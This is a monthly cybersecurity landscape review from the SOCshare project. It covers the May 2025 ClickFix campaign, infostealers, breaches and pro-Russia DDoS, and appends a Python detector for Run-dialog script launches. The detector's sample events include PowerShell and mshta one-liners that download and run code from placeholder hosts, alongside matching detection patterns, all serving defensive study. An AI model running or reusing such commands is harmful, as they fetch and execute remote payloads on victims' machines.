SOCshare May 2025: cybersecurity landscape review


May 2025 continued the trend of high tempo across the cyber threat landscape. While ransomware remained a constant, and geopolitical tensions increasingly spilled into cyberspace, the month was defined by social engineering, specifically the widespread “ClickFix” malware wave. 

ClickFix: The Defining Malware Wave of May 

The standout threat in May was a large-scale ClickFix campaign. This activity was mostly observed targeting public and private organisations in Portugal, particularly within the government, finance, and transportation sectors. 

These attacks represent a shift away from complex software exploitation toward direct user manipulation: 

  • The Lure: The campaign’s infection chain begins with phishing emails carrying a malicious ZIP attachment. An HTML file inside the ZIP redirects the victim to a malicious website that mimics the legitimate Portuguese tax authority. 
  • The Mechanism: Upon visiting the spoofed site, victims were presented with a fake document or software installation page. They were prompted to copy a PowerShell command and execute it manually in the Windows “Run” dialog. 
  • Variations: While the Portuguese campaign focused on tax documents, other global ClickFix cases used different social engineering tactics. In some instances, users were tricked into running commands to “fix” broken software (such as a fake Chrome or Microsoft Word error) or to solve a fake CAPTCHA challenge. 
  • The Payload: In the Portuguese campaign, the primary payload was Lampion, a banking trojan/infostealer. However, globally, the technique has also been used to deploy Lumma Stealer, remote access trojans (Xworm and AsyncRAT), and other modular loaders. 

The ClickFix wave demonstrated that attackers can bypass traditional perimeter security by exploiting a user’s willingness to troubleshoot their own system, effectively “living off the land” with legitimate administrative tools (such as PowerShell) to execute obfuscated code. 

What Else Happened in May 2025? 

  1. Endless Abuse of Scripting and Living-off-the-Land Tools – Beyond ClickFix, attackers continued to leverage legitimate scripting frameworks to evade detection. Reports highlighted AutoIt-compiled droppers (such as DarkCloud Stealer) being used in phishing campaigns targeting government and technology sectors in the Netherlands and Hungary. These tools allow threat actors to create lightweight, evasive malware delivery chains that blend in with normal administrative traffic. 
  2. Ransomware and Data Leaks – While ransomware groups remained active, data theft and extortion took center stage over pure encryption attacks. Significant breaches in May included a massive data exposure affecting 26.5 million users of South Korean operator SK Telecom, as well as a breach at data broker LexisNexis. These incidents emphasize that credential theft and long-term access remain higher priorities for attackers than immediate disruption.
  3. Geopolitical Conflict and Influence Operations – The cyber domain heavily reflected real-world geopolitical tensions in May:
  • DDoS Attacks: Pro-Russia groups, such as NoName057(16), launched disruptive DDoS attacks against public and private services in the Netherlands (in retaliation for military aid to Ukraine) and Romania (targeting government portals during elections). 
  • Disinformation: Influence operations targeted the May 18th parliamentary elections in Portugal, with bot networks amplifying specific political narratives. 
  • Espionage: Seven EU Member States formally called out activity by the Russian GRU (APT28). 

Key Takeaways 

  • Social engineering is becoming as effective as exploitation – ClickFix proves that convincing users to manually run commands is a viable alternative to zero-day exploits. 
  • Identity is the new perimeter – With the rise of infostealers like Lampion and Lumma, protecting credentials is crucial. 
  • Geopolitics dictates target selection – DDoS attacks and disinformation are now standard during election periods and major EU policy decisions. 

Looking Ahead 

Organizations should focus on: 

  • Restricting Script Execution – Monitoring and blocking unnecessary PowerShell execution (especially commands initiated from the Run dialog) is required. 
  • User Awareness – Training must cover ClickFix lures. Users should be taught that legitimate support pages will never ask them to copy-paste code into a terminal. 
  • Identity Protection – Implementing MFA and robust credential-theft detection. 
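As an added example (not part of the SOCshare post), the following Python script turns the ClickFix mechanism described above and the “Restricting Script Execution” recommendation into a simple detection: it flags script hosts launched by explorer.exe (which is how a command pasted into the Win+R Run dialog is spawned) whose command line carries the traits of a pasted one-liner. The event field names follow Sysmon Event ID 1 loosely, and the events and URLs are constructed samples.

```python
import re

# Constructed sample process-creation events (not real telemetry), shaped loosely
# like Sysmon Event ID 1. A command pasted into the Win+R Run dialog is spawned by
# explorer.exe, so that parent/child pair is the first thing to look for.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/x)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\Scripts\backup.ps1"},   # benign admin script
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/captcha.hta"},  # fake-CAPTCHA variant
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# Traits of pasted one-liners: hidden window, bypassed policy, download-and-run, encoded command.
SUSPICIOUS = [
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"https?://", re.I),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the indicators matched by one event; an empty list means no match."""
    hits = []
    if basename(ev["Image"]) not in SCRIPT_HOSTS:
        return hits
    if basename(ev["ParentImage"]) == "explorer.exe":
        hits.append("script host spawned by explorer.exe (Run dialog / shell)")
    hits += [p.pattern for p in SUSPICIOUS if p.search(ev["CommandLine"])]
    return hits

def detect(events, min_hits=2):
    """Alert on events with at least min_hits indicators; the parent alone is too noisy."""
    return [(ev["CommandLine"], h) for ev in events if len(h := score_event(ev)) >= min_hits]

if __name__ == "__main__":
    for cmd, hits in detect(SAMPLE_EVENTS):
        print(f"ALERT: {cmd}\n  indicators: {hits}")
```

When triaging a suspected host, the Run dialog also leaves a per-user trail in the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records what was typed or pasted even if process telemetry was missed.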

May 2025 showed that modern malware waves don’t always arrive through complex exploits; sometimes, they arrive one convincing “ClickFix” at a time. 

References 

This entry is published as part of the SOCshare project (No. 101145843), which we are running together with Vilnius City Municipality. It is partly funded by the European Union. The views and opinions expressed are those of the authors alone and do not necessarily reflect those of the European Union or the European Cyber Security Centre of Excellence. Neither the European Union nor the European Cyber Security Centre of Excellence can be held responsible for them.
